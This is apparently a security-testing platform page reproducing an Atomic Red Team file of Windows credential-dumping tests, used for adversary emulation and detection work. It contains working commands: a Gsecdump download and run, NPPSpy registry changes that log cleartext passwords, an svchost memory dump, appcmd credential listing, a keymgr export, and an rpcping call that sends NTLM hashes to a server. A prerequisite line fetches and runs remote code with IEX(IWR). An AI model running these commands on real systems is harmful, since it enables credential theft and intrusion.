Dump Credential Manager using keymgr.dll and rundll32.exe
Product information
Updated
This test executes the exported function `KRShowKeyMgr` located in `keymgr.dll` using `rundll32.exe`. It opens a window that allows to export stored Windows credentials from the credential manager to a file (`.crd` by default). The file can then be retrieved and imported on an attacker-controlled computer to list the credentials get the passwords. The only limitation is that it requires a CTRL+ALT+DELETE input from the attacker, which can be achieve multiple ways (e.g. a custom implant with remote control capabilities, enabling RDP, etc.). Reference: https://twitter.com/0gtweet/status/1415671356239216653
MITRE ATT&CK® techniques
Summary
- Source control
- redcanaryco/atomic-red-team
- Status
- Synced
- File path
- atomics/T1003/T1003.yaml
- Due date
Activity
created atomics/T1003/T1003.yaml
Raw rule
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9
description: |
Dump credentials from memory using Gsecdump.
Upon successful execution, you should see domain\username's followed by two 32 character hashes.
If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus.
You will receive only error output if you do not run this test from an elevated context (run as administrator)
If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
gsecdump_bin_hash:
description: File hash of the Gsecdump binary file
type: string
default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
gsecdump_url:
description: Path to download Gsecdump binary file
type: url
default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
dependency_executor_name: powershell
dependencies:
- description: |
Gsecdump must exist on disk at specified location (#{gsecdump_exe})
prereq_command: |
if (Test-Path "#{gsecdump_exe}") {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
Move-Item $binpath "#{gsecdump_exe}"
}
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
elevation_required: true
- name: Credential Dumping with NPPSpy
auto_generated_guid: 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
description: |-
Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy.
After user's logging in cleartext password is saved in C:\NPPSpy.txt.
Clean up deletes the files and reverses Registry changes.
NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: NPPSpy.dll must be available in ExternalPayloads directory
prereq_command: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll") {exit 0} else {exit 1}
get_prereq_command: |-
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll"
executor:
command: |-
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"
cleanup_command: |-
$cleanupPath = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$cleanupUpdatedValue = $cleanupPath.PROVIDERORDER
$cleanupUpdatedValue = $cleanupUpdatedValue -replace ',NPPSpy',''
Set-ItemProperty -Path $cleanupPath.PSPath -Name "PROVIDERORDER" -Value $cleanupUpdatedValue
Remove-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy" -Recurse -ErrorAction Ignore
Remove-Item C:\NPPSpy.txt -ErrorAction Ignore
Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Dump svchost.exe to gather RDP credentials
auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9
description: |
The svchost.exe contains the RDP plain-text credentials.
Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
supported_platforms:
- windows
executor:
command: |
$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
cleanup_command: |
Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
auto_generated_guid: 6c7a4fd3-5b0b-4b30-a93e-39411b25d889
description: |-
AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: IIS must be installed prior to running the test
prereq_command: if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
get_prereq_command: |-
Install-WindowsFeature -name Web-Server -IncludeManagementTools
executor:
command: |-
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
name: powershell
elevation_required: true
- name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
auto_generated_guid: 42510244-5019-48fa-a0e5-66c3b76e6049
description: |-
AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: IIS must be installed prior to running the test
prereq_command: if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
get_prereq_command: |-
Install-WindowsFeature -name Web-Server -IncludeManagementTools
executor:
command: |-
C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
name: powershell
elevation_required: true
- name: Dump Credential Manager using keymgr.dll and rundll32.exe
auto_generated_guid: 84113186-ed3c-4d0d-8a3c-8980c86c1f4a
description: |-
This test executes the exported function `KRShowKeyMgr` located in `keymgr.dll` using `rundll32.exe`. It opens a window that allows to export stored Windows credentials from the credential manager to a file (`.crd` by default). The file can then be retrieved and imported on an attacker-controlled computer to list the credentials get the passwords. The only limitation is that it requires a CTRL+ALT+DELETE input from the attacker, which can be achieve multiple ways (e.g. a custom implant with remote control capabilities, enabling RDP, etc.).
Reference: https://twitter.com/0gtweet/status/1415671356239216653
supported_platforms:
- windows
executor:
command: rundll32.exe keymgr,KRShowKeyMgr
name: powershell
- name: Send NTLM Hash with RPC Test Connection
auto_generated_guid: 0b207037-813c-4444-ac3f-b597cf280a67
description: |-
RpcPing command can be used to send an RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
Ref: https://twitter.com/vysecurity/status/974806438316072960
supported_platforms:
- windows
input_arguments:
custom_port:
description: Specify the custom port number
type: integer
default: "1234"
server_ip:
description: Specify the server IP address. If not specified, the loop back IP will be used
type: string
default: 127.0.0.1
executor:
command: "rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1>$Null"
name: powershell
elevation_required: false